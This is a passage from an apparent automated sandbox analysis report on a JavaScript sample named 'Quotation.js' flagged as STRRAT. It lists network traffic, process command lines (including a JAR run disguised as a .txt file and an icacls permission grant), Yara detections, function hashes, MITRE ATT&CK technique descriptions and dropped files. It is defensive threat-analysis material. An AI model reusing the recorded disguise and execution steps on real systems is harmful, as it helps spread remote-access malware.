Nov 26, 2024 09:05:35.413111925 CET	443	49968	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:35.413240910 CET	49968	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:35.414326906 CET	49968	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:35.414334059 CET	443	49968	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:35.414469957 CET	49968	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:05:35.414537907 CET	443	49968	199.232.192.209	192.168.2.4
Nov 26, 2024 09:05:35.414593935 CET	49968	443	192.168.2.4	199.232.192.209

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 09:03:31.814219952 CET	65353	53	192.168.2.4	1.1.1.1
Nov 26, 2024 09:03:31.814219952 CET	58577	53	192.168.2.4	1.1.1.1
Nov 26, 2024 09:03:31.955868006 CET	53	58577	1.1.1.1	192.168.2.4
Nov 26, 2024 09:03:32.054071903 CET	53	65353	1.1.1.1	192.168.2.4
Nov 26, 2024 09:04:05.374476910 CET	55363	53	192.168.2.4	1.1.1.1
Nov 26, 2024 09:04:05.514211893 CET	53	55363	1.1.1.1	192.168.2.4
Nov 26, 2024 09:04:35.202697992 CET	52614	53	192.168.2.4	1.1.1.1
Nov 26, 2024 09:04:35.451936960 CET	53	52614	1.1.1.1	192.168.2.4
Nov 26, 2024 09:05:12.124646902 CET	61716	53	192.168.2.4	1.1.1.1
Nov 26, 2024 09:05:12.269531965 CET	53	61716	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 09:03:31.814219952 CET	192.168.2.4	1.1.1.1	0x69c6	Standard query (0)	repo1.maven.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:03:31.814219952 CET	192.168.2.4	1.1.1.1	0xda15	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:04:05.374476910 CET	192.168.2.4	1.1.1.1	0xd753	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:04:35.202697992 CET	192.168.2.4	1.1.1.1	0xcdf4	Standard query (0)	repo1.maven.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:05:12.124646902 CET	192.168.2.4	1.1.1.1	0x2085	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 09:03:31.955868006 CET	1.1.1.1	192.168.2.4	0xda15	No error (0)	github.com		20.233.83.145	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:03:32.054071903 CET	1.1.1.1	192.168.2.4	0x69c6	No error (0)	repo1.maven.org	dualstack.sonatype.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 09:03:32.054071903 CET	1.1.1.1	192.168.2.4	0x69c6	No error (0)	dualstack.sonatype.map.fastly.net		199.232.192.209	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:03:32.054071903 CET	1.1.1.1	192.168.2.4	0x69c6	No error (0)	dualstack.sonatype.map.fastly.net		199.232.196.209	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:04:05.514211893 CET	1.1.1.1	192.168.2.4	0xd753	No error (0)	github.com		20.233.83.145	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:04:35.451936960 CET	1.1.1.1	192.168.2.4	0xcdf4	No error (0)	repo1.maven.org	dualstack.sonatype.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 09:04:35.451936960 CET	1.1.1.1	192.168.2.4	0xcdf4	No error (0)	dualstack.sonatype.map.fastly.net		199.232.192.209	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:04:35.451936960 CET	1.1.1.1	192.168.2.4	0xcdf4	No error (0)	dualstack.sonatype.map.fastly.net		199.232.196.209	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:05:12.269531965 CET	1.1.1.1	192.168.2.4	0x2085	No error (0)	github.com		20.233.83.145	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	03:03:27
Start date:	26/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js"
Imagebase:	0x7ff6c6f10000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:03:29
Start date:	26/11/2024
Path:	C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"
Imagebase:	0x140000
File size:	257'664 bytes
MD5 hash:	6E0F4F812AE02FBCB744A929E74A04B8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:03:29
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Imagebase:	0x270000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:03:29
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 02EAD8F7 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d024061512a4bdc32a9a0bdf580497186cac8fa3f120ecc333c9ce52fc929a42
Instruction ID: b0577cd8290458564c6897e77f14b2737cdf51f7d38a22e8cc4c52f029eda111
Opcode Fuzzy Hash: d024061512a4bdc32a9a0bdf580497186cac8fa3f120ecc333c9ce52fc929a42
Instruction Fuzzy Hash: 2FA178B5A446019FDB18CF24C9A4BA9FBB1FF49318F08D199D81A4FB81C774B844CB91

Function 02EAD8D1 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a5883e476cf2eaa75aef49dae558ce68d757f8bf359179a11dfaa9c6b794ad1
Instruction ID: 14831d29bcdfba9227cecc9ed513e0ed3dc88e8c6af418de03adc611cfa0d457
Opcode Fuzzy Hash: 8a5883e476cf2eaa75aef49dae558ce68d757f8bf359179a11dfaa9c6b794ad1
Instruction Fuzzy Hash: B2719A716446419FDB18CF24C8A8BAAFBB1FB49318F08D199E81A4FB81C774B855CB91

Function 02EA0672 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea0000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed75e148c468f5adb501353e2aad55fe9f6ba1d7e63b2f06930a3a0182af5efc
Instruction ID: 7c835613d5ea825df7cd5701960aa7e779a969791d87214cdcc4bd1dc849f45e
Opcode Fuzzy Hash: ed75e148c468f5adb501353e2aad55fe9f6ba1d7e63b2f06930a3a0182af5efc
Instruction Fuzzy Hash: 081179B294022A8FCF14DF4CC4A16ADB7B0FB88318B568525EC65A7741D3347920CB80

Function 02EA0722 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea0000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a88776f8235f6b0c93d982b0301c995d4e8eee1a694dd39eb109f49dc123123
Instruction ID: d7e84bc0fc6b2a0fe69cfd4c8138ca398a1509fd1933978d7e8eb14a0555b331
Opcode Fuzzy Hash: 3a88776f8235f6b0c93d982b0301c995d4e8eee1a694dd39eb109f49dc123123
Instruction Fuzzy Hash: 33F01576C40229DB8B14EF48C4802EDB7B1EB4421CB1AC496EC283B251D332AD62CF81

Function 02EB4B78 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb3da491a6cf878cf013816811daa9b8940a1a1badcc5a4b217b5c4899c0362
Instruction ID: f4e0ad97a2ef327dc615441711cd5c01a0069cd42c049cd4c8da9a35cd541490
Opcode Fuzzy Hash: fdb3da491a6cf878cf013816811daa9b8940a1a1badcc5a4b217b5c4899c0362
Instruction Fuzzy Hash: AEF0DFB5900A06EBDB158F21C0047DAFBB4FB88718F04821AC42C57710C778B4258BC0

Function 02EAA793 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6edde7d4917b38e7bd5915c9c4ec7d86c75c78c2c8110ed49667211a817e4beb
Instruction ID: 62792dcbf4f4c49b8ac330f8dfa722329e6d93d52ceca5a6702bf15b388d2439
Opcode Fuzzy Hash: 6edde7d4917b38e7bd5915c9c4ec7d86c75c78c2c8110ed49667211a817e4beb
Instruction Fuzzy Hash: A6F09BB6A04A06EBDB25CF61C1147CAFBB4BB88718F15821AC42C67750C779B46ACBC0

Function 02EAEC1C Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71659bab748dd7b99836d29083f13491512a2cb0313185376b83c6ef3f3ecf28
Instruction ID: 1f9bb1ad503839646eb59f54382e5cadd25012896524417dfa5960dc358a7649
Opcode Fuzzy Hash: 71659bab748dd7b99836d29083f13491512a2cb0313185376b83c6ef3f3ecf28
Instruction Fuzzy Hash: 02F09BB6A04A06EBDB29CF65C1047DAFBB4BB88728F14421AC42C67750D779B469CBC0

Function 02EADA35 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b099e26bd4467bfd9d1535e314b6f3e73312af48bfd66f1356137a738b216386
Instruction ID: c6c755b946d92911eefc43e2dd33648a2a8e50c027c7d54136c8dcf7e89e01d1
Opcode Fuzzy Hash: b099e26bd4467bfd9d1535e314b6f3e73312af48bfd66f1356137a738b216386
Instruction Fuzzy Hash: 1AF0C2B6D00A0AEBDB248F65C1047DAFBB5BB88718F14421AC42C67710D378B465CBC0

Function 02EB50F6 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8152c0b837792747a501bcd5b9e918df0c3eb0000eae02b858d43aeb7eb2da51
Instruction ID: 52e8f24e0f76ba95b4f41600f1d538d7fa714a235fb7740bc5962eb9857389a3
Opcode Fuzzy Hash: 8152c0b837792747a501bcd5b9e918df0c3eb0000eae02b858d43aeb7eb2da51
Instruction Fuzzy Hash: 6CF0C2B6D00A06ABDB258F65C1047CAFBB4BB84B28F18821AC42C67710C778B469CBC0

Function 02EB49AA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49929165720543a233d5ffab3ef4b87fa2150d1900eb4a07ffdb5e0d22e290b9
Instruction ID: 853d2f580282ffe5942173e0d0d071484fd4e35bdea46a6dc870f546f7a799c3
Opcode Fuzzy Hash: 49929165720543a233d5ffab3ef4b87fa2150d1900eb4a07ffdb5e0d22e290b9
Instruction Fuzzy Hash: 3DF0C2B6D00A06ABDB248F65C1047CAFBB4BB88718F14421AC42C67710D378B465CBC0

Function 02EADE6E Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1286c9f17d25f33fc0c18c600b40a8ff85795854795e51718b2aa85a7031f90f
Instruction ID: 90caf631f569ea39639a1fdec4dfadf05e84beb8b94eecbea52c541af5b4c748
Opcode Fuzzy Hash: 1286c9f17d25f33fc0c18c600b40a8ff85795854795e51718b2aa85a7031f90f
Instruction Fuzzy Hash: 82F0C2B6D00A06ABDB248F61C1047CAFBB4BB84718F15421AC42C67710C778B465CBC0

Function 02EB3C76 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 450f17ccb9ee0dd6fd9387a3f69bfaade7c94ff39ec49aa45a55c34a0d8f83ba
Instruction ID: ea195617e01e80feea6d15b54079f02baadf93bd7ca9dea67b35335f553e3cc5
Opcode Fuzzy Hash: 450f17ccb9ee0dd6fd9387a3f69bfaade7c94ff39ec49aa45a55c34a0d8f83ba
Instruction Fuzzy Hash: 6DF0C2B6D00A0AABDB248F65C1047CAFBB4BB88718F14421AC42C67710D378B465CBC0

Function 02EB45E9 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a999b90eff59fa21d5f652705539af576e00840ed0f5438aba595010e759ba3e
Instruction ID: d8004f2fe0594ed816cb368024683f82c8bfb61c7fd51e2b34d6d1eaf8f9dcc6
Opcode Fuzzy Hash: a999b90eff59fa21d5f652705539af576e00840ed0f5438aba595010e759ba3e
Instruction Fuzzy Hash: 94F0C2B6D00A0AABDB248F65C1047CAFBB5BB88728F14421AC52C67710D378B465CBC0

Non-executed Functions

Function 02EA03C0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2980971343.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2ea0000_javaw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
Instruction ID: e1838b9c855de8d5d159de9ab417dc0e6e68f1025a8d1a48f8e95107287e27d2
Opcode Fuzzy Hash: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
Instruction Fuzzy Hash: DB2126BA5482569FDB358F188C503D9B7E5FB18314F21882EDECDEB710D3306A898B90

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: STRRAT

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp

C:\Users\user\AppData\Local\Temp\hsperfdata_user\7588

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\nvbyatbnf.txt

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Windows Analysis Report
Quotation.js